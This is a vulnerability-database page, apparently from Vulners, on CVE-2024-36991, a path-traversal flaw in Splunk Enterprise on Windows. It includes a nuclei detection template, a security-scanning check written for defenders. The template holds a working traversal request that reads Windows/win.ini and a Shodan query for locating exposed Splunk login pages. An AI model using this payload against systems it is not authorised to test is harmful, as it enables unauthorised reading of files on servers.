Lucene search
K

Splunk Enterprise - Local File Inclusion

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 250 Views

Splunk Enterprise - Local File Inclusion vulnerability below versions 9.2.2, 9.1.5, and 9.0.10 on Windows allows path traversal in messaging module

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Splunk
31 Mar 202504:24
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
6 Jul 202417:15
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
30 Mar 202521:11
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
6 Jul 202400:49
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
6 Jul 202415:24
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
30 Mar 202514:50
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
30 Mar 202521:11
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
6 Jul 202503:50
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
20 Mar 202622:48
githubexploit
GithubExploit
Exploit for Path Traversal in Splunk
6 Jul 202401:00
githubexploit
Rows per page
id: CVE-2024-36991

info:
  name: Splunk Enterprise - Local File Inclusion
  author: DhiyaneshDK
  severity: high
  description: |
    In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.
  impact: |
    Attackers can perform path traversal to access sensitive filesystem locations on Splunk Enterprise for Windows.
  remediation: |
    Update Splunk Enterprise to version 9.2.2, 9.1.5, or 9.0.10 or later.
  reference:
    - https://x.com/sheikhrishad0/status/1809210005125746880/photo/1
    - https://x.com/chybeta/status/1809249794122215557/photo/1
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36991
  classification:
    epss-score: 0.1311
    epss-percentile: 0.95889
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Login | Splunk"
  tags: cve,cve2024,splunk,lfi,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /en-US/login HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Splunk Inc.")'
        condition: and
        internal: true

  - raw:
      - |
        GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 490a00463044022002ac211220a05f630df4bfef756d5e4f14739862e259130a22a72799ce74922f02206fcfb48317356fe2cceb9cb79981a2ab79dc94bbf3f89c579f7c45b51cc5651b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.1311
SSVC
250